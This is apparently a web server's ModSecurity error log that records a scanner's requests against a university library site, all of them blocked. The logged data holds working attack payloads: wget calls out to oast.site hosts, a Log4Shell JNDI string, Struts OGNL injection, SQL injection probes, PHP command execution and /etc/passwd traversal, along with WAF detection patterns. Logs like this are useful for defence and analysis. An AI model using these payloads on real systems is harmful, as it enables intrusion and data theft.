[Tue Aug 29 11:30:12.686293 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPS5u8AAAAh"]
[Tue Aug 29 11:30:13.329674 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPOhWYAAAAa"]
[Tue Aug 29 11:30:13.376152 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAPENaAAAAAQ"]
[Tue Aug 29 11:30:15.349372 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPRNXsAAAAf"]
[Tue Aug 29 11:30:15.373322 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAOH4RIAAAAH"]
[Tue Aug 29 11:30:16.323817 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgeksdpry9kzpt7.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgeksdpry9kzpt7.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgeksdpry9kzpt7.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPENasAAAAQ"]
[Tue Aug 29 11:30:17.612614 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAOM4UwAAAAU"]
[Tue Aug 29 11:30:19.403775 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAOH4RgAAAAH"]
[Tue Aug 29 11:30:20.539684 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAO8738AAAAF"]
[Tue Aug 29 11:30:22.518598 2023] [:error] [pid 992] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgfos9j3fy9k5jr.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPgCPAAAAAj"]
[Tue Aug 29 11:30:23.315586 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10X8Co-f0AAAPahvAAAAAL"]
[Tue Aug 29 11:30:23.331887 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/forgot_password.php"] [unique_id "ZO10X8Co-f0AAAOYZiUAAAAB"]
[Tue Aug 29 11:30:24.309007 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10YMCo-f0AAAPMl@4AAAAY"]
[Tue Aug 29 11:30:24.361680 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAO-1ooAAAAI"]
[Tue Aug 29 11:30:25.343093 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAOIvTwAAAAM"]
[Tue Aug 29 11:30:25.392761 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YcCo-f0AAANh1qAAAAAA"]
[Tue Aug 29 11:30:25.406878 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgyexey1ek4scru.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPahvYAAAAL"]
[Tue Aug 29 11:30:27.525697 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAPENcsAAAAQ"]
[Tue Aug 29 11:30:27.668257 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10Y8Co-f0AAAPENcsAAAAQ"]
[Tue Aug 29 11:30:28.319045 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPPSvEAAAAd"]
[Tue Aug 29 11:30:29.390937 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAOOuUgAAAAW"]
[Tue Aug 29 11:30:30.442855 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ZsCo-f0AAAPDnwkAAAAP"]
[Tue Aug 29 11:30:30.536898 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/lcms/index.php"] [unique_id "ZO10ZsCo-f0AAAPPSvsAAAAd"]
[Tue Aug 29 11:30:32.679230 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:f_ntp_server. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:f_ntp_server: `curl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/system_mgr.cgi"] [unique_id "ZO10aMCo-f0AAAOOuVMAAAAW"]
[Tue Aug 29 11:30:33.461256 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  ../../../../../../../../../../../../ found within ARGS:subWidgets[0][config][code]: echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO10acCo-f0AAAOM4W0AAAAU"]
[Tue Aug 29 11:30:33.635313 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10acCo-f0AAAPv-EEAAAAM"]
[Tue Aug 29 11:30:34.314835 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlg76geodwj5mwaf.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10asCo-f0AAAPv-EMAAAAM"]
[Tue Aug 29 11:30:34.464169 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPQkfwAAAAe"]
[Tue Aug 29 11:30:34.470332 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfh.unla.ac.id"] [uri "/webtools/control/SOAPService"] [unique_id "ZO10asCo-f0AAAPQkfwAAAAe"]
[Tue Aug 29 11:30:35.350979 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPDnyAAAAAP"]
[Tue Aug 29 11:30:35.931926 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAANh1r0AAAAA"]
[Tue Aug 29 11:30:36.431288 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPv-FAAAAAM"]
[Tue Aug 29 11:30:37.331664 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAOM4XMAAAAU"]
